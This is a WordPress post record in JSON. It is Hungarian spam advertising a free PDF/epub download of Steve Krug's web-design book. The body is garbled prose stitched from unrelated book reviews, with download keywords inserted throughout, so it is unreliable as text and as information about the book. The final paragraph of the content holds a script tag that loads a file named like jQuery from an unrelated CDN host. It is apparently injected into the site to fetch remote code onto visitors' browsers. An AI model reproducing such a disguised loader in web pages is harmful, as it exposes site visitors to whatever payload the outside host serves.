{"id":44376,"date":"2025-10-13T19:39:02","date_gmt":"2025-10-14T02:39:02","guid":{"rendered":"https:\/\/www.laudlifesupport.com\/?p=44376"},"modified":"2026-01-17T23:39:07","modified_gmt":"2026-01-18T07:39:07","slug":"ne-tord-a-fejem-felhasznalobarat-webdizajn-a-te-pdf-gyujtemenyed","status":"publish","type":"post","link":"https:\/\/www.laudlifesupport.com\/index.php\/ne-tord-a-fejem-felhasznalobarat-webdizajn-a-te-pdf-gyujtemenyed\/","title":{"rendered":"Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn &#8211; A te PDF gy\u0171jtem\u00e9nyed"},"content":{"rendered":"<h1>Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn  Steve Krug<\/h1>\n<p>A k\u00f6rnyezet \u00e9l\u00e9nken megval\u00f3sult, visszavitt let\u00f6lt\u00e9s ingyen olyan id\u0151be \u00e9s helyre, amely egyszerre nosztalgikus \u00e9s elfelejtett. Azt, hogy dr. Ornish programja milli\u00f3k \u00faj rem\u00e9nyt \u00e9s v\u00e1laszt\u00e1sokat adott, bizony\u00edt\u00e9k azzal ezen megk\u00f6zel\u00edt\u00e9s erej\u00e9re, \u00e9s annak hat\u00e1s\u00e1ra az emberek \u00e9let\u00e9n. A t\u00f6rt\u00e9net egy er\u0151s eml\u00e9keztet\u0151 volt a rem\u00e9ny \u00e9s epub ingyen let\u00f6lt\u00e9s kitart\u00e1s fontoss\u00e1g\u00e1ra, egy bizony\u00edt\u00e9k az emberi lelkiismeret k\u00e9pess\u00e9g\u00e9re, hogy fel\u00fcl legyen az ak\u00e1r s\u00f6t\u00e9tebb kih\u00edv\u00e1sokon.<\/p>\n<p>A t\u00f6rt\u00e9nelemrajong\u00f3k sz\u00e1m\u00e1ra ez a k\u00f6nyv egy gondosan kutatott t\u00e9nyek \u00e9s adatok kincsesb\u00e1ny\u00e1ja, egy \u00e1tfog\u00f3 besz\u00e1mol\u00f3 egy fordul\u00f3pontnak a kollekt\u00edv m\u00faltunkban. A szerz\u0151 nyelvi haszn\u00e1lata k\u00f6ltem\u00e9nyes volt, mint pdf ingyenes let\u00f6lt\u00e9s sz\u00e1zadok \u00f3ta \u00e9nekel\u0151 dala, \u00e9s Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn vetett az \u00e9rz\u00e9sek \u00e9s gondolatok vil\u00e1g\u00e1ra n\u00e9h\u00e1ny, j\u00f3l kiv\u00e1lasztott sz\u00f3ban. Gyakran tapasztaltam, hogy a legbefoly\u00e1sosabb k\u00f6nyvek azok, amelyek gondolkodni tesznek a saj\u00e1t \u00e9letr\u0151l \u00e9s kapcsolatokr\u00f3l, hangot adnak az \u00e9rt\u00e9keink \u00e9s priorit\u00e1saink t\u00fckr\u00e9ben.<\/p>\n<p>ingyenes ebook let\u00f6lt\u00e9s folytattam az oldalakat, egyre ink\u00e1bb feltettem a f\u0151szerepl\u0151 cselekedeteinek k\u00e9rd\u00e9s\u00e9t, amelyeknek szem\u00e9lyes mor\u00e1lis kompassz\u00e1ja nem volt vil\u00e1gos. B\u00e1r a k\u00f6nyvnek nem volt hi\u00e1ba hib\u00e1i, m\u00e9lyen meg\u00e9rint\u0151 \u00e9s gondolkodtat\u00f3 olvasm\u00e1ny volt, amit nagyon aj\u00e1nlani tudok. Ez a Davenport nem-k\u00f6nyveinek gy\u0171jtem\u00e9nye, b\u00e1r nem olyan \u00e1tfog\u00f3, mint a K\u00e9pzelet geogr\u00e1fi\u00e1ja, m\u00e9gis sok \u00e9rt\u00e9kes, gondolkodtat\u00f3 tartalmat k\u00edn\u00e1l. J\u00f3 olvasm\u00e1ny azok sz\u00e1m\u00e1ra, akik m\u00e1r fanok Davenport m\u0171vein\u00e9l. Mik\u00f6zben olvas\u00e1si \u00e9lm\u00e9nyemen Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn meglep\u0151d\u00f6k azon, ahogyan a k\u00f6nyv egyszerre elb\u0171v\u00f6lt \u00e9s csal\u00f3dott engem, egy igazi \u00e9rzelmi hull\u00e1mvas\u00fat, amely l\u00e9legzetel\u00e1ll\u00edt\u00f3 \u00e9s zavarodottan hagyott engem, online k\u00f6nyv ingyen t\u00f6rt\u00e9net, amely a mem\u00f3ri\u00e1mban k\u00eds\u00e9rtett, mint egy szellem.<\/p>\n<h2>Az ingyenes e-k\u00f6nyv kezdem\u00e9nyez\u00e9s Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn<\/h2>\n<p>A zsarnoks\u00e1gt\u00f3l a demokr\u00e1ci\u00e1ig k\u00f6nyv ingyen olvas\u00e1s ingyenes ebook let\u00f6lt\u00e9s online Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn olyan t\u00e9ma, amely v\u00e9gigfut a t\u00f6rt\u00e9neten, \u00e9s megmutatja, hogy a v\u00e1ltoz\u00e1s lehet ebook let\u00f6lt\u00e9s fokozatos, mind hirtelen.<\/p>\n<p>Az irodalmi fikci\u00f3 vil\u00e1g\u00e1ban ez a k\u00f6nyv kiemelkedik, egy eredetis\u00e9g jelz\u0151f\u00e9nye egy m\u0171fajban, amely gyakran hajlamos az ism\u00e9tl\u00e9sre, egyedi hangja \u00e9s perspekt\u00edv\u00e1ja egy friss leveg\u0151 adagja. Ez a k\u00f6nyv egy k\u00f6telez\u0151 olvasm\u00e1ny mindazoknak, akik szenved\u00e9lyesen \u00e9rdekl\u0151dnek a t\u00e1rsadalmi igazs\u00e1goss\u00e1g, a fenntarthat\u00f3s\u00e1g \u00e9s az online k\u00f6nyv ingyen jogok ir\u00e1nt, \u00e9s egy leny\u0171g\u00f6z\u0151 \u00e9s ingyenes k\u00f6nyvek olvas\u00e1sa felfedez\u00e9st keresnek a vil\u00e1gunkat form\u00e1l\u00f3 k\u00e9rd\u00e9sekben. A legjobb k\u00f6nyvek Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn k\u00e9rd\u00e9st Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn maguk ut\u00e1n, mint v\u00e1laszt, \u00e9s arra \u00f6szt\u00f6n\u00f6znek, hogy m\u00e9lyen \u00e9s kritikusan gondolkodj a k\u00f6r\u00fcl\u00f6tted l\u00e9v\u0151 vil\u00e1gr\u00f3l.<\/p>\n<p>Ez egy olyan reg\u00e9ny k\u00f6nyv ingyen olvas\u00e1s amely a kaland szellem\u00e9t testes\u00edtette meg, egy hat\u00e1rtalan lehet\u0151s\u00e9g \u00e9rz\u00e9s\u00e9t, horizontokat v\u00e1rva, hogy felfedezz\u00e9k, rejt\u00e9lyeket v\u00e1rva, hogy megfejtsenek. Egy j\u00e1t\u00e9kos \u00e9s szeret\u0151 sz\u00f6vegben egy ap\u00e1d kifejezi rem\u00e9nyeit \u00e9s \u00e1lmait egy egyedi kapcsolatra gondolva a ingyenes let\u00f6lt\u00e9s ami miatt a k\u00f6nyvet sz\u00fcl\u0151knek \u00e9s gyerekeknek is olvasni kell. Amikor vissza\u00e9rek az olvas\u00e1si \u00e9lm\u00e9nyemre, eml\u00e9keztetnek a mes\u00e9z\u00e9s erej\u00e9re, hogy Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn \u00e9s frusztr\u00e1ljon, pdf k\u00f6nyv ingyen \u00e9s csaljon.<\/p>\n<h3>Steve Krug ingyenes k\u00f6nyv let\u00f6lt\u00e9s<\/h3>\n<p>David Weber leg\u00fajabb m\u0171ve egy megb\u00edzhat\u00f3 olvasm\u00e1ny, amely egy j\u00f3l \u00fctemezett \u00e9s \u00e9rdekes t\u00f6rt\u00e9netet k\u00edn\u00e1l, ami ebook let\u00f6lt\u00e9s a m\u0171fajban. Ak\u00e1r egy \u00fczleti vezet\u0151, egy csapatmenedzser vagy csak valaki, aki \u00e9rdekl\u0151dik a szervezeti dinamik\u00e1ban, ez a k\u00f6nyv egy ebook \u00e9rt\u00e9kes inform\u00e1ci\u00f3t k\u00edn\u00e1l. Tal\u00e1n ez a legnagyobb var\u00e1zslat \u2013 ahogy \u00fagy \u00e9rzed, mintha el\u0151sz\u00f6r l\u00e1tn\u00e1d a vil\u00e1got, m\u00e9g akkor is, ha nem vagy teljesen biztos abban, mit l\u00e1tasz. Magas rem\u00e9nyekkel kezdtem el olvasni ezt a folytat\u00e1st, miut\u00e1n nagyon \u00e9lveztem az els\u0151 k\u00f6nyvet, \u00e9s b\u00e1r nem teljesen felelt meg az elv\u00e1r\u00e1saimnak, m\u00e9gis \u00e9rdemes volt elolvasni.<\/p>\n<p>A k\u00f6nyv egy vad utaz\u00e1s volt, tele fordulatokkal \u00e9s csavarokkal, amelyek a sz\u00e9kemen tartottak, a sz\u00edvem pedig az izgalomt\u00f3l d\u00fcb\u00f6g\u00f6tt. Az identit\u00e1s \u00e9s ebook pdf ingyen let\u00f6lt\u00e9s Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn t\u00e9m\u00e1i m\u00e9lyen rezon\u00e1ltak, \u00e9s a szerz\u0151 \u00e9rz\u00e9kenyen vizsg\u00e1lta \u0151ket. Richthofen t\u00f6rt\u00e9nete a kitart\u00e1s \u00e9s a meghat\u00e1roz\u00e1s fontoss\u00e1g\u00e1nak er\u0151teljes eml\u00e9keztet\u0151je, \u00e9s inspir\u00e1l\u00f3 olvasni arr\u00f3l, hogyan k\u00fczd\u00f6tte le digit\u00e1lis akad\u00e1lyokat \u00e9s \u00e9rte el a c\u00e9ljait.<\/p>\n<p>Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn t\u00f6rt\u00e9netnek volt ingyen lend\u00fclete, egy hajt\u00f3er\u0151, amely el\u0151re lend\u00edtett, de valahogy hi\u00e1nyzott bel\u0151le a finoms\u00e1g. A legink\u00e1bb megd\u00f6bbent\u0151 ebook ingyen ebben a k\u00f6nyvben, hogy k\u00e9pes volt a sz\u00f3rakoztat\u00e1s \u00e9s oktat\u00e1s k\u00f6z\u00f6tti sz\u0171k vonalat megtartani, \u00f6sszetett t\u00e9ma \u00e9s gondolatokat olyan m\u00f3don bemutatva, ami hozz\u00e1f\u00e9rhet\u0151 \u00e9s fesszeg\u0151 volt, mintha egy r\u00e9gi bar\u00e1t, aki t\u00e9mavezet\u0151 szak\u00e9rt\u0151, besz\u00e9lgetne velem.<\/p>\n<h3>Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn pdf<\/h3>\n<p>Ez a k\u00f6nyv sz\u00fcks\u00e9ges olvasm\u00e1ny b\u00e1rki sz\u00e1m\u00e1ra, aki szeretn\u00e9 megismerni a emberi l\u00e9t \u00f6sszetetts\u00e9g\u00e9t, a hib\u00e1kkal \u00e9s imill\u00e1ssal egy\u00fctt. Ez a k\u00f6nyv egy \u00e9rzelmi szimf\u00f3nia, egy gy\u00f6ny\u00f6r\u0171, k\u00eds\u00e9rt\u0151 dallam, amely sok\u00e1ig tartott az utols\u00f3 hangjegy ut\u00e1n.<\/p>\n<p>A karakterek, mint a szellemek, a tudat perif\u00e9ri\u00e1j\u00e1ban v\u00e1ndoroltak, sosem teljesen megv\u00e1ltak konkr\u00e9tnak \u00e9rzett l\u00e9nyekk\u00e9. A nyelv haszn\u00e1lat\u00e1ban a szerz\u0151 egy mesters\u00e9geses tiszta besz\u00e9dt\u00f6rt\u00e9nete, egy sz\u00f3var\u00e1zslatot \u00f6nt\u00f6tte, ami mind var\u00e1zslatos, mind hallgat\u00f3z\u00f3 volt. A szerz\u0151, Mar\u00eda del Mar Sacasa, egy olyan receptgy\u0171jtem\u00e9nyt oszt meg, ami t\u00f6k\u00e9letes a hideg t\u00e9lihetekre, \u00e9s \u00edr\u00e1sst\u00edlusa vonz\u00f3 \u00e9s k\u00f6nnyen k\u00f6vetend\u0151.<\/p>\n<p>A karakterek \u00e9rzelmi utaz\u00e1sai m\u00e9lyen \u00e1rnyalatosak \u00e9s megk\u00f6zel\u00edthet\u0151ek voltak, ami bizony\u00edt\u00e9k az szerz\u0151 k\u00e9pess\u00e9g\u00e9r\u0151l, hogy hiteles \u00e9s meggy\u0151z\u0151 portr\u00e9kat alkotson az emberi k\u00f6nyv ingyen egy igazi k\u00e9pzeletgazdags\u00e1g m\u0171ve. Azonban nem tudtam meg\u00e1llni, hogy ne \u00e9rezzem, a gy\u0171jtem\u00e9ny valami hi\u00e1ny\u00e1t, egy bizonyos gy\u00fajt\u00f3energi\u00e1t, ami k\u00fcl\u00f6nlegess\u00e9 tenn\u00e9.<\/p>\n<p>A t\u00f6rt\u00e9net vil\u00e1ga \u00e9l\u00e9nken megjelenik, egyedi \u00e9s leny\u0171g\u00f6z\u0151 alap\u00f6tlettel, amely mag\u00e1ba k\u00f6nyv online let\u00f6lt\u00e9s \u00e9s nem enged el. A t\u00f6rt\u00e9net olyan megfogad\u00f3, hogy az els\u0151 oldalt\u00f3l fogva r\u00e1m h\u00fazott. Kezdetben a t\u00f6rt\u00e9net elsz\u00e1rmaztat\u00e1sa epub t\u0171nt, de ahogy m\u00e9lyebbre mer\u00fclt, a mes\u00e9z\u00e9s sz\u00e1lai elkezdtek sz\u00e9tszaladr\u00e1zni, ami cs\u00edp\u0151s \u00e9rz\u00e9st let\u00f6lt\u00e9s epub k\u00e9rd\u00e9seket vett ki bel\u0151lem, mire k\u00e9ne gondolnom.<\/p>\n<p>A szerz\u0151 nyelvhaszn\u00e1lata sz\u00e9p \u00e9s evokat\u00edv, egy olyan vil\u00e1got fest, amely egyszerre vibr\u00e1l\u00f3 \u00e9s k\u00eds\u00e9rt\u0151, egy vil\u00e1g, amely veled marad, miut\u00e1n befejezed az olvas\u00e1st. Nem gyakran tal\u00e1lkozom ebook let\u00f6lt\u00e9s reg\u00e9nnyel, amely igaz\u00e1n Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn \u00e9rz\u0151dik, ingyen \u00e9s t\u00f6rt\u00e9nete pulz\u00e1l\u00f3 \u00e9s dinamikus energi\u00e1val.<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=13072576\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn Steve Krug A k\u00f6rnyezet \u00e9l\u00e9nken megval\u00f3sult, visszavitt let\u00f6lt\u00e9s ingyen olyan id\u0151be \u00e9s helyre, amely egyszerre nosztalgikus \u00e9s elfelejtett. Azt, hogy dr. Ornish programja milli\u00f3k \u00faj rem\u00e9nyt \u00e9s v\u00e1laszt\u00e1sokat adott, bizony\u00edt\u00e9k azzal ezen megk\u00f6zel\u00edt\u00e9s erej\u00e9re, \u00e9s annak hat\u00e1s\u00e1ra az emberek \u00e9let\u00e9n. A t\u00f6rt\u00e9net egy er\u0151s eml\u00e9keztet\u0151 volt a rem\u00e9ny &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.laudlifesupport.com\/index.php\/ne-tord-a-fejem-felhasznalobarat-webdizajn-a-te-pdf-gyujtemenyed\/\"> <span class=\"screen-reader-text\">Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn &#8211; A te PDF gy\u0171jtem\u00e9nyed<\/span> Read More \u00bb<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-44376","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":"Laudlife","author_link":"https:\/\/www.laudlifesupport.com\/index.php\/author\/laudlife\/"},"uagb_comment_info":0,"uagb_excerpt":"Ne t\u00f6rd a fejem! &#8211; Felhaszn\u00e1l\u00f3bar\u00e1t webdiz\u00e1jn Steve Krug A k\u00f6rnyezet \u00e9l\u00e9nken megval\u00f3sult, visszavitt let\u00f6lt\u00e9s ingyen olyan id\u0151be \u00e9s helyre, amely egyszerre nosztalgikus \u00e9s elfelejtett. Azt, hogy dr. Ornish programja milli\u00f3k \u00faj rem\u00e9nyt \u00e9s v\u00e1laszt\u00e1sokat adott, bizony\u00edt\u00e9k azzal ezen megk\u00f6zel\u00edt\u00e9s erej\u00e9re, \u00e9s annak hat\u00e1s\u00e1ra az emberek \u00e9let\u00e9n. A t\u00f6rt\u00e9net egy er\u0151s eml\u00e9keztet\u0151 volt a rem\u00e9ny&hellip;","_links":{"self":[{"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/posts\/44376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/comments?post=44376"}],"version-history":[{"count":1,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/posts\/44376\/revisions"}],"predecessor-version":[{"id":44377,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/posts\/44376\/revisions\/44377"}],"wp:attachment":[{"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/media?parent=44376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/categories?post=44376"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.laudlifesupport.com\/index.php\/wp-json\/wp\/v2\/tags?post=44376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}